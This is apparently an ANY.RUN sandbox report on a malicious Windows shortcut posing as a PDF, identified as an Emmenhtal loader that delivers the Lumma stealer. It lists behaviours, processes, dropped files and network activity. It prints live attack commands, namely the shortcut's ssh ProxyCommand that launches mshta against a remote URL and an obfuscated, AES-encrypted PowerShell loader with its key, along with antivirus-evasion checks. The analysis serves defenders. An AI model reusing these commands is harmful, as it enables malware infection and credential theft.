File name:

Instruction_695-18014-012_Rev.pdf.lnk

Full analysis: https://app.any.run/tasks/3c43dfe0-1419-4cf0-a4cd-01437d930cf8
Verdict: Malicious activity
Threats:

First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments.

Malware Trends Tracker     >>>
Analysis date: December 31, 2024, 10:43:19
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
emmenhtal
loader
lumma
stealer
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

C5997A14E872D97D48E1D4EA8B66910F

SHA1:

E5BC26705B9DF5EADFC65FF0BB600743B4D2894D

SHA256:

1E31450855498AA18F97E2BD1B77AA3CF652B88271502CA7EE926938C04B722F

SSDEEP:

24:8N8PZsx/Tfff//YK/Urrt1v+/+GaWbUkT+1Z8lOxk86+vddS9dbEQWhWUIeFIU:87TXvYKKLGaaUkIigdo9aQv5W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2380)
      • powershell.exe (PID: 4640)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 2380)
      • powershell.exe (PID: 4640)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4640)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 2380)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 4640)

    • LUMMA mutex has been found

      • powershell.exe (PID: 4840)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 4840)

    • Steals credentials from Web Browsers

      • powershell.exe (PID: 4840)

    • Executing a file with an untrusted certificate

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
      • ManyCam.exe (PID: 7076)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 7044)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 3208)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4640)

    • LUMMA has been detected (YARA)

      • powershell.exe (PID: 4840)

    • Antivirus name has been found in the command line (generic signature)

      • tasklist.exe (PID: 6484)
      • cmd.exe (PID: 1356)
      • find.exe (PID: 1556)
      • cmd.exe (PID: 7156)
      • tasklist.exe (PID: 6768)
      • find.exe (PID: 6716)
      • tasklist.exe (PID: 3780)
      • cmd.exe (PID: 5788)
      • find.exe (PID: 2788)
      • cmd.exe (PID: 6804)
      • tasklist.exe (PID: 6660)
      • find.exe (PID: 6652)
      • cmd.exe (PID: 5968)
      • tasklist.exe (PID: 5404)
      • find.exe (PID: 5572)

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 6056)

    • EMMENHTAL loader has been detected

      • powershell.exe (PID: 2380)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 2380)

  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 6704)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6704)
      • ssh.exe (PID: 6608)
      • mshta.exe (PID: 6056)
      • powershell.exe (PID: 2380)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 2380)

    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 2380)

    • Executes script without checking the security policy

      • powershell.exe (PID: 2380)
      • powershell.exe (PID: 4640)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 6056)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 2380)
      • mshta.exe (PID: 6056)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4840)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 7044)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 3208)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)

    • Starts itself from another location

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)

    • Process drops legitimate windows executable

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)

    • Detected use of alternative data streams (AltDS)

      • pcaui.exe (PID: 7120)

    • Reads the Windows owner or organization settings

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)

    • Reads security settings of Internet Explorer

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)

    • Get information on the list of running processes

      • cmd.exe (PID: 7156)
      • cmd.exe (PID: 6912)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
      • cmd.exe (PID: 1356)
      • cmd.exe (PID: 5788)
      • cmd.exe (PID: 6804)
      • cmd.exe (PID: 5968)

    • Starts CMD.EXE for commands execution

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)

    • Uses TIMEOUT.EXE to delay execution

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)

  • INFO

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2380)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2380)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 6056)

    • Checks proxy server information

      • mshta.exe (PID: 6056)
      • powershell.exe (PID: 4640)

    • The process uses the downloaded file

      • mshta.exe (PID: 6056)
      • powershell.exe (PID: 2380)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)

    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 2380)

    • Disables trace logs

      • powershell.exe (PID: 4640)

    • Manual execution by a user

      • powershell.exe (PID: 4840)

    • Checks supported languages

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
      • ManyCam.exe (PID: 7076)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 7044)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 3208)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
      • EdgeColorLib.exe (PID: 4984)

    • The sample compiled with english language support

      • powershell.exe (PID: 4840)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)

    • Create files in a temporary directory

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 7044)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 3208)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
      • EdgeColorLib.exe (PID: 4984)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4640)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4640)
      • powershell.exe (PID: 2380)

    • Reads the computer name

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • ManyCam.exe (PID: 7076)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
      • EdgeColorLib.exe (PID: 4984)

    • Reads CPU info

      • ManyCam.exe (PID: 7076)

    • Process checks computer location settings

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2380)

    • Creates files or folders in the user directory

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: ssh.exe
Description: Adobe PDF Document
RelativePath: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
CommandLineArguments: -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" .
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
170
Monitored processes
45
Malicious processes
12
Suspicious processes
7

Behavior graph

Click at the process to see the details
start ssh.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs mshta.exe #EMMENHTAL powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs #LUMMA powershell.exe s5xf7pff0l5ebljadotqx9.exe s5xf7pff0l5ebljadotqx9.exe manycam.exe no specs pcaui.exe no specs 6j8w5nmxy4osav2vaeqfq8v5dng.exe 6j8w5nmxy4osav2vaeqfq8v5dng.tmp 6j8w5nmxy4osav2vaeqfq8v5dng.exe 6j8w5nmxy4osav2vaeqfq8v5dng.tmp timeout.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs find.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs find.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs find.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs find.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs find.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs find.exe no specs edgecolorlib.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
372\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1356"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"C:\Windows\System32\cmd.exe6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1556find /I "avastui.exe"C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
2380"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function TrjYX($flSrW){return -split ($flSrW -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$YADH = TrjYX('DFD2C4EE694F45A0F3E44D0ADB7C270ED749DC7EF6401593F912CAEC63EF494D2EA2B3EF9F686623457F9914D620D611022B18BA0AA0DA1EFDE2E837FE39A91A30FB5E6573FA055C3E7BA28124949B3ED6932A18174825D67854EE52ACF723B81E60324C0D6BB98AEF1EB1A543C9D999234298B091465420D7E678C70EEA52EF2891813AEA77837E607B9AA4B9CA48902BA47B052AA796DC7DCC46E8CDCC1F3A0B6AE1982FCB5E9AADD4AC06A8B3EC58D236BF15F88EEC99296360D8DAAB39C76009D1B53A6A6592628D3B91A2FF8CD9E6CF4C6AA6B2B1AC1A4EC30CD890FBEFE013363935E75223B5891C72DC9720C7BFFB82DE0A2A658523FF0596554EE6B93D170C95D2C73D668B79AB3805EB0C1B2F2102F50F2172BCEED6511D84BC60904371B726620DDDECAF47BF8570631C1AC8BE6433308ED4EE47D2C8397190F4FB64D5070B3A6AA137EBC1791C26E64B6D88F1D398624C247A78D00DD99D453EBDCD7775DFEF76F3527D277D0716C411D35DFDC7A351AC61FA6A59C2CC2EE95CB64D6A5FD8310B84717A79FE639D0620EDA3617A9C3E209B953A29D65B23064B065EF698B96AED9A06DFE7BF9F199B165934F240DDB7163876E610FB1EB324F418489D5087729CF835E9C268808745D2F62C3CAEF82CB852A2FBAA610EAD441BA7387BF47ED42B7FEF4FC88AC2E68A1539CBD71191BAA99109E86F924FFBA11D3570610E1CDD1E98AA7A122A57CC1C82C4AA02341B8A52AD5A3B37F2056FA02B5656D6CA0C1F63337300C00187629B6F5500ABDAA224CFA4A19D1CF101651AA1240E5D02349C2E8C811B4A7DE2821AA988DB7405BBD69F3484AE7B4418B65DA204E4D93203333531935F9495CD0FEA855CC922B884963170630432E080916425C235D7EDCBBB89AFE7E0679403EBED09331390CCFDA2B8F68FB071A02E856888D5F28FD240D5C4B564ECF068306D252C5C07D3BFD66AB9C0FD617192399F19554EDA678EBF8B3A9618968D66FED847212DF14E048C7DC678206736A9F16FB976CF6EBEF6C365532E463F8024E388CBE1D7A8E22AE8798996E88B1A1F1B56FCE98B74083AE8618E642AAE11A1643C4476C2CD301CC9971A5C0629C96473C4B545A18A9CFEF1E062F749F187FF75E92ED1EF9924F0DF262050D9024217B6CE78522A5E4DFBCB500C084B8057C0BA4563577EA61A826040529EFA152845A1CA56A281F4A0CFE86ABFF8F9C3213DD7E557B6C7C519F5557A477495FF52EB8A620284845B044D616AD32C1D804B12308000548C0B515E113702A7F32421C530046120779FC30935D5344F608BD7DDAE9BAB35437E9D708086D3E939CFEFFDA611356DF6AA900E5C83D4FD620A3352EFA0044AF0B0D5D92E353F793F9A6C7EEA3BC852D11770B234DA2DA29512B0AE7A651C11CE4548CFD3573E888DEB73BD39094A2AE13481BD53909F3B93944EBAC62ADA321FFBBD8298D9A07C5EA9735CF3ADBFA8FE008819904F8D8B48DD74C81686CF41B7D7B76D406866F33B693440B8B12ED039488C6A0140262F8CE24530428F56663B272F3B2E239248933013CD87DBF5190B96DAADA854731F97D3F7F828B104BEA2CBD41966E042F1E2F654282459D2940BB8F3554DAC31B9E11E9A9ADB9563F8D1BC2AB39A67A1A98999D6F7866E9258AE29355B8F08B375460B2C30640E8BA0972C0F481476770BAFA7D3873B1E34052E7ADCEA081EEAD35C3D8FE00034B05C7C');$isCf=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((TrjYX('437556726455514B504167474D78786B')),[byte[]]::new(16)).TransformFinalBlock($YADH,0,$YADH.Length)); & $isCf.Substring(0,3) $isCf.Substring(129)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
2788find /I "avgui.exe"C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
3208"C:\Users\admin\AppData\Local\Temp\6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe" /VERYSILENTC:\Users\admin\AppData\Local\Temp\6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe
6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp
User:
admin
Company:
ColorStream
Integrity Level:
MEDIUM
Description:
ColorStream Enhancement Library
Exit code:
0
Version:
2.1.0.47
Modules
Images
c:\users\admin\appdata\local\temp\6j8w5nmxy4osav2vaeqfq8v5dng.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\comctl32.dll
c:\windows\syswow64\advapi32.dll
3560find /I "opssvc.exe"C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
3780tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH C:\Windows\System32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3884\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4052\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
21 407
Read events
21 390
Write events
17
Delete events
0

Modification events

(PID) Process:(6056) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6056) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6056) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(4640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
17
Suspicious files
8
Text files
10
Unknown types
0

Dropped files

PID
Process
Filename
Type
2380powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ilqsib1u.2dt.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6056mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:971C514F84BBA0785F80AA1C23EDFD79
SHA256:F157ED17FCAF8837FA82F8B69973848C9B10A02636848F995698212A08F31895
6924powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pwtyu4iu.by1.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6056mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:67E486B2F148A3FCA863728242B6273E
SHA256:FACAF1C3A4BF232ABCE19A2D534E495B0D3ADC7DBE3797D336249AA6F70ADCFB
6704powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ujmyujlt.twj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6704powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s2lmk5uh.onj.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7104S5XF7PFF0L5EBLJADOTQX9.exeC:\Users\admin\AppData\Local\Temp\{0CE73DEB-3A6A-4C05-B6A5-18059F853E5F}\.ba\CrashRpt.dllexecutable
MD5:AB1A78EA3C767A7419E18D0A8113AB40
SHA256:C04027BA0B872C906B9C910E27D7CE5AAB17C4D11F4B5330B32E9590723FF93D
4640powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bbz4ulhx.kjh.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4640powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_50nonihz.p44.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7104S5XF7PFF0L5EBLJADOTQX9.exeC:\Users\admin\AppData\Local\Temp\{0CE73DEB-3A6A-4C05-B6A5-18059F853E5F}\.ba\Cockatoo.dllexecutable
MD5:0FFB11D4AF21F736AB72DCA83095A161
SHA256:40F6A2921E7BAF7FD78B2738A4F17D863C6F3ABCAE22692CA27055AC67EAD794
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
43
DNS requests
22
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.38.73.129:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1688
svchost.exe
GET
200
23.32.238.112:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.32.238.112:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6056
mshta.exe
GET
200
142.250.185.67:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1688
svchost.exe
GET
200
23.38.73.129:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6056
mshta.exe
GET
200
142.250.185.67:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
6376
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1688
svchost.exe
23.32.238.112:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.32.238.112:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5064
SearchApp.exe
2.19.80.27:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.38.73.129:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1688
svchost.exe
23.38.73.129:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
unknown
1176
svchost.exe
40.126.32.134:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
www.bing.com
  • 2.19.80.27
  • 2.19.80.89
whitelisted
crl.microsoft.com
  • 23.32.238.112
  • 23.32.238.107
whitelisted
www.microsoft.com
  • 23.38.73.129
  • 95.101.149.131
whitelisted
google.com
  • 142.250.186.110
whitelisted
ocsp.digicert.com
